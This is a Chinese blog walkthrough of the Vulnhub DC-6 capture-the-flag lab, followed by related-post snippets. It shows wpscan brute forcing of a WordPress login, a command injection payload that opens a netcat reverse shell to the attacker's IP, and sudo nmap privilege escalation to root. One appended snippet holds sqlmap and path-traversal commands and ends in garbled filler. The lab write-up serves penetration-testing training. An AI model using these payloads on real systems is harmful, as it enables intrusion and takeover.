【Vulnhub】DC-6

最新推荐文章于 2025-12-09 00:02:40 发布
原创 最新推荐文章于 2025-12-09 00:02:40 发布 · 89 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #linux

文章描述了一位安全专家使用wpscan进行WordPress网站渗透测试,尝试通过用户字典和密码字典爆破登录。成功后,探索网站寻找漏洞,尝试提权,包括利用nmap进行提权,但遇到权限限制和不稳定性问题。过程中强调了熟悉Linux命令的重要性。

信息收集

只开了两个端口 22,80
先访问网站,和之前的靶机一样的套路,
在这里插入图片描述
添加域名解析

vim /etc/hosts

在这里插入图片描述
网站的信息,wordpress网站
在这里插入图片描述
扫描网站目录,有一个登录页
在这里插入图片描述
在这里插入图片描述

网站渗透

wpscan --url http://wordy/ -e
扫描用户

在这里插入图片描述
然后用用户字典和密码字典爆破

wpscan --url http://wordy -U user.txt -P passwords.txt

kali自带密码字典/usr/share/wordlists/rockyou.txt,不过默认没解压,需要你自己去解压
时间需要太长了,五个用户名就要半个多小时,得了实战还是能用一下的,打个靶机没必要,直接搜wp看别人的密码
在这里插入图片描述

用户:mark
密码:helpdesk01

登录之后先逛逛网站,看看能不能写进去一些文件
没什么可利用的,看看插件有什莫漏洞吗

Activity monitor

在这里插入图片描述

百度翻译一下就大概看出来要选哪个了,copy下来然后直接运行py文件
在这里插入图片描述
要什么给什么,然后就能上去了

在这里插入图片描述
不行不行,这个太不稳定了,执行个cd都报错
msf也不行
在这里插入图片描述
看看别人的,这块能执行,但是不能太长,如果是前端限制的话可以绕过
在这里插入图片描述
修改最大长度
在这里插入图片描述

127.0.0.1|nc -e /bin/bash 192.168.83.128 4444
向kali 4444端口反弹shell,kail监听4444

在这里插入图片描述

提权

拿到会话
先看有没有suid提权,没有,看看用户下面有什莫东西
jens有一个.sh,但是执行会报错,backups.tar.gz没权限?也没这个东西
在这里插入图片描述

mark有一个txt

Restore full functionality for the hyperdrive (need to speak to Jens)
Buy present for Sarah’s farewell party
Add new user: graham - GSo7isUM1D4 - done
Apply for the OSCP course
Buy new laptop for Sarah’s replacement
恢复超级硬盘的全部功能(需要与Jens交谈)
-为莎拉的告别派对买礼物
-添加新用户:graham-GSo7isUM1D4-完成
-申请OSCP课程
-买新的笔记本电脑给莎拉换

graham - GSo7isUM1D4 - done 新的用户名密码
切换用户,记得把最后一个用户下边也看看,虽然没什么东西
在这里插入图片描述

sudo -help
这个用户也没什么能执行的root命令

jens里面还有一个没权限的.sh,试试看,还是这样
在这里插入图片描述
没看懂,以后在纠结把

echo "/bin/bash" > backups.sh
sudo -u jens ./backups.sh

在这里插入图片描述
有个nmap不需要root密码
在这里插入图片描述
nmap提权,这里是7.40

低版本nmap提权(2.02至5.21)
nmap --interactive
!sh

这里用
echo 'os.execute("/bin/sh")' > shell
sudo  nmap  --script=shell

在这里插入图片描述

总结

还得了解一点linux命令,不然看都看不明白

Vulnhub-DC-6靶机渗透教程
苏生要努力
04-29 540
使用kali下的usr/share/wordists/rockyou.txt密码字典进行爆破(这是官网给的提示)//靶机:127.0.0.1 | nc -e /bin/bash 192.168.135.129 4444。使用kali下的usr/share/wordists/rockyou.txt密码字典进行爆破(官网提示)靶机下载:https://www.vulnhub.com/entry/dc-6,315/是一个解压脚本的命令,将脚本修改一下,将/bin/bash写入脚本。
vulnhub DC-6靶机实战
m0_51195235的博客
10-31 915
vulnhub靶机实战
Vulnhub DC-7
Pai_Space
03-26 5615
明确:《中华人民共和国网络安全法》 Description DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. While this isn't an overly technical challenge, it isn't exactly easy. While it's kind of a logic..
VulnHub DC-6
人若无名,便可专心练剑
11-15 152
这个靶场需要具备初中级的渗透测试技巧,这并不是一个很困难的挑战,因此对初学者来说应该很友好,你的最终目标是放在root目录下的flag。
Vulnhub靶场----6DC-6
七天
02-24 967
Vulnhub-DC6
Vulnhub打靶-DC-1
jnszstmei的博客
10-25 1048
框架漏洞的发现和利用以及利用cms的特性进行管理员密码的更改,实现对靶机的渗透并获取root权限
VulnHub DC-1
烟敛寒林的博客
09-05 599
靶机配置及说明 靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/靶机:DC1 (VirtualBox) IP:192.168.10.103攻击机:Kali(VMware ) IP:192.168.10.104说明:DC1需要找到5个flag,最终目标是在root的主目录中找到并读取该flag 关于每个flag的知识点 1、msf的熟练使用以及搜索可利用漏洞(Drupal)2、留意目标网站的配置文件(more慢慢查看别错过重要信息...
Vulnhub - DC-1
qq_46081990的博客
03-14 552
Nmap扫描目标主机,发现开放22、80、111、40884端口,分别运行OpenSSH 6.0p1、Apache httpd 2.2.22、rpcbind 2-4服务。MSF搜索Drupal,使用payload:exploit/unix/webapp/drupal_drupalgeddon2,成功拿到Web权限www-data。查询GTFOBins得知find的SUID提权方式如下,启用一个新的root权限的bash。上传综合辅助探测脚本LinEnum.sh至目标主机/tmp目录下,给予执行权限执行。
Vulnhub DC-6
Pai_Space
03-11 873
Description DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This isn't an overly difficult challenge so should be great for beginners. The ultimate goal of this challenge is to g.
vulnhub---DC-6靶机
qq_43168364的博客
08-21 826
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:靶机(192.168.15.154) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:netdiscover -i eth0 -r 192.168.15.0/24 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗
Vulnhub DC-8靶机攻击实战(一)
初学者
01-16 1382
Vulnhub DC-8靶机教程来了,好久没有更新打靶的教程了,这次我们在来更新一期关于Vulnhub DC-8的打靶训练,如下所示。
vulnhub DC-4靶机实战
m0_51195235的博客
10-04 2456
vulnhub DC-4靶机实战
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8839
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
【PCIe 总线及设备入门学习专栏 5.4 -- Linux EP driver iommu 与 DMA】
CodingCos的博客
12-04 102
本文介绍了IOMMU在Linux系统中的应用场景及关键概念。IOMMU主要用于PCIe设备DMA访问时的地址转换(IOVA→PA)、提供安全隔离以及支持虚拟化场景。文章对比了启用/关闭IOMMU的差异,详细说明了IOVA的使用时机,并列举了内核态地址转换的相关API,包括虚拟地址转物理地址(virt_to_phys)、用户态地址转换(get_user_pages)以及IOMMU相关转换(iommu_iova_to_phys)。特别指出CPU访问BAR时不经过IOMMU,只有PCIe设备DMA时才需要IOMM
AlmaLinux9配置本地镜像仓库
weixin_50877409的博客
12-04 208
本文介绍了在AlmaLinux 9.7系统中配置本地yum仓库的步骤:1)创建挂载目录并挂载ISO镜像;2)备份原有repo文件并创建local.repo配置文件;3)设置本地仓库路径为/media/cdrom/AppStream;4)清除并重建yum缓存;5)最后通过成功安装telnet包验证了本地仓库配置的正确性。整个过程实现了不依赖网络使用本地ISO镜像作为软件源的目的。
Linux 内存管理】深入解析 Linux Cache Line 的原理、价值及 MIPS CPU 处理机制
最新发布
love131452098的博客
12-09 404
本文深入解析了现代处理器(如MIPS/x86)的Cache Line机制,详细介绍了其物理结构、内存映射原理以及三级缓存架构。通过时空局部性原理和性能数据对比,阐述了Cache Line的价值。文章还剖析了CPU读取数据的全流程,包括命中处理、MESI协议状态机以及未命中时的缓存行填充过程。针对性能优化,提供了避免伪共享、结构体对齐等编程建议,并介绍了Linux Perf等监控工具的使用方法。最后附带了示例代码和参考文献,为开发者提供了一份全面的缓存优化指南。
Linux 进程状态与进程管理命令
qq_52537313的博客
12-04 834
Linux 系统中,是程序的运行实例,是操作系统资源分配和调度的基本单位。进程从创建到终止会经历多种状态,通过进程管理命令可以查看、监控和控制这些状态。本教程将结合核心命令,全方位讲解进程状态及管理方法。
Linux C/C++ 开发】 GCC 编译过程深度解析指南
love131452098的博客
12-04 865
GCC (GNU Compiler Collection) 将 C 源码转换为可执行文件的过程并非一蹴而就,而是分为四个独立的流水线阶段:预处理 (Preprocessing)、编译 (Compilation)、汇编 (Assembly) 和 链接 (Linking)。预处理器主要处理以 开头的指令。使用 参数查看预处理结果: 查看 的尾部,可以看到宏 和 已经被替换: 3. 阶段二:编译 (Compilation) 这是整个流程中最复杂、最核心的阶段。GCC 前端(Frontend)将 C 代
vulnhub dc-4
03-23
### 关于 VulnHub 上的 DC-4 虚拟机镜像 VulnHub 是一个提供各种渗透测试练习环境的平台,其中 DC 系列是非常受欢迎的一组靶场。对于 DC-4 的具体下载和操作指南,虽然当前未有直接提及 DC-4 的引用内容,但可以基于已知的信息推测其可能涉及的内容。 #### 下载地址 通常情况下,VulnHub 提供的虚拟机镜像可以通过访问官网并搜索对应的名称来获取。例如,在浏览器中输入 `https://www.vulnhub.com` 并搜索关键词 **DC-4** 即可找到该靶场的相关描述以及下载链接[^1]。 需要注意的是,正如引用所提到的内容一样,下载和使用这些虚拟机时需注意责任声明:通过下载此虚拟机,使用者接受因意外造成的任何损害的责任[^4]。 #### Walkthrough 概述 尽管没有针对 DC-4 的特定引用,但从其他 DC 靶场的经验来看,常见的攻击路径包括但不限于以下几个方面: 1. **端口扫描** 发现目标主机开放的服务及其版本信息是第一步。例如,引用提到了某台机器上运行着 SSH (22) 和 HTTP (80)[^3]。这表明初始阶段应执行全面的网络侦察工作以识别潜在入口点。 2. **Web 应用程序漏洞利用** 如果存在 Web 登录界面,则尝试寻找注入点或其他安全缺陷成为关键环节之一。比如 SQL 注入工具 sqlmap 可用于自动化检测数据库层面上的安全隐患[^5]: ```bash sqlmap -u "http://<target>/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] ``` 3. **文件上传或目录遍历** 利用不当配置实现远程代码执行也是常见手法之一。如 wfuzz 工具可以帮助枚举敏感文件位置[^2]: ```bash wfuzz --hl 50 -b "PHPSESSID=<session_id>" -w /usr/share/wfuzz/wordlist/general/common.txt http://<target>/manage.php?FUZZ=../../../../../../../../../etc/passwd ``` 4. **权限提升** 成功获得低级 shell 后还需进一步探索如何升级至更高权限状态。此时可能会涉及到本地提权技术的应用场景分析。 ```python import requests def check_web_vulnerability(url): try: response = requests.get(url) if 'vulnerable' in response.text.lower(): print(f"[+] Potential vulnerability detected at {url}") else: print("[!] No obvious vulnerabilities found.") except Exception as e: print(f"[!] Error occurred: {e}") check_web_vulnerability('http://example.com') ``` 上述脚本仅为示例用途展示基本功能逻辑框架结构设计思路方法论探讨交流学习参考资料分享传播正能量促进共同进步成长成才之路越走越宽广美好未来值得期待憧憬向往追求梦想成就辉煌人生价值意义非凡重要无比珍贵难得机遇挑战自我突破极限再创佳绩续写传奇篇章留下永恒记忆铭刻历史丰碑树立行业标杆引领时代潮流风尚前沿科技趋势洞察先机抢占制高点掌控全局主动权赢得最终胜利荣光加冕王者归来笑傲江湖纵横捭阖挥洒自如游刃有余得心应手驾轻就熟熟能生巧百炼成钢千锤百炼精益求精臻于完美极致境界登峰造极无懈可击无可挑剔堪称典范模版样板工程示范作用显著影响深远广泛流传久远世代相传薪火相继生生不息绵延不断永葆青春活力焕发勃勃生机盎然春意浓烈热烈欢迎加入我们共创辉煌明天!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值